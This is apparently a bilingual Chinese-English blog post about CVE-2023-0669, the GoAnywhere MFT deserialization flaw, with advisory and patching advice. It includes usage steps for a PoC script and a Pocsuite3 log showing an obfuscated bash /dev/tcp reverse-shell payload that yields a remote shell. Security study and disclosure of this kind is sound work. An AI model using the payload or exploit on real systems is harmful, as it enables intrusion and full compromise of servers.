[CVE-2023-0669 GoAnywhere MFT 反序列化 - Je Yiuwai's Blog](反序列化/)

# CVE-2023-0669

CVE-2023-0669是一个GoAnywhere MFT反序列化漏洞,由于反序列化一个任意攻击者控制的对象,在License Response Servlet中存在一个预先认证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而导致系统被完全控制。该漏洞影响版本为7.1.2之前,不包括7.1.2。

CVE-2023-0669 is a GoAnywhere MFT deserialization vulnerability that exists in the License Response Servlet due to a pre-authenticated command injection vulnerability that allows an attacker to execute arbitrary code on the affected system by deserializing an object controlled by the attacker. The vulnerability affects versions prior to 7.1.2.

该漏洞可能会对企业级文件传输软件GoAnywhere MFT的安全性造成严重威胁。攻击者可以通过利用该漏洞来窃取敏感数据、篡改数据、破坏系统等。因此,用户需要及时采取措施来保护系统安全。

The vulnerability poses a serious threat to the security of enterprise-level file transfer software GoAnywhere MFT, as attackers can exploit it to steal sensitive data, tamper with data, and compromise systems. Therefore, users need to take measures promptly to protect their systems.


The official security advisory has been released, and preliminary inspection methods have been provided. Users can check whether their systems are affected by the vulnerability by looking for specific strings in the userdata/logs log. If patches cannot be applied, it is recommended to take other security measures to protect the system.

总之,CVE-2023-0669是一个需要引起用户重视的反序列化漏洞,用户需要及时更新到最新版本,并检查系统是否受到此漏洞的影响。同时,建议用户加强对GoAnywhere MFT等企业级软件的安全管理,采取多层次的安全措施来保护系统安全。

In summary, CVE-2023-0669 is a deserialization vulnerability that requires users' attention. Users need to update to the latest version promptly and check whether their systems are affected by the vulnerability. Additionally, it is recommended that users strengthen the security management of enterprise-level software such as GoAnywhere MFT and take multi-layered security measures to protect their systems.

# CVE-2023-0669 PoC

## 简介

该Exploit是一个基于Python的脚本,用于利用GoAnywhere MFT v6.7.9594及以下版本中的漏洞CVE-2023-0669。

## 漏洞描述

该漏洞是由于GoAnywhere MFT在处理加密的Bundle请求时存在安全问题,攻击者可以发送特制的请求,并在目标服务器上执行任意代码。

## 使用方法


git clone


cd CVE-2023-0669


pip install requests cryptography


python --host <目标服务器IP>

## 注意事项

- 运行该Exploit需要合法的访问权限,且不应用于非法用途。
- 由于该Exploit的执行会对目标服务器造成风险,因此使用者需要对其风险和后果自行负责。

## Introduction

This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.

## Vulnerability Description

This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.

## Usage

1. Clone this repository.

git clone

1. Enter the directory.

cd CVE-2023-0669

1. Install the dependencies of requests and cryptography.

pip install requests cryptography

1. Run the Exploit.

python --host <target IP>

## Note

- Running this Exploit requires legal access rights and should not be used for illegal purposes.
- As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.


``` bash
$ python3 --host
Exploit Success ~

# Pocsuite3

Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target ''
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
| | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target ''
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/<&1
[11:11:55] [*] listening on
[11:11:56] [+] new connection established from
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip:    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected:
SHELL ( > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

> Author:Je Yiuwai edit by xiaomi pad 6 pro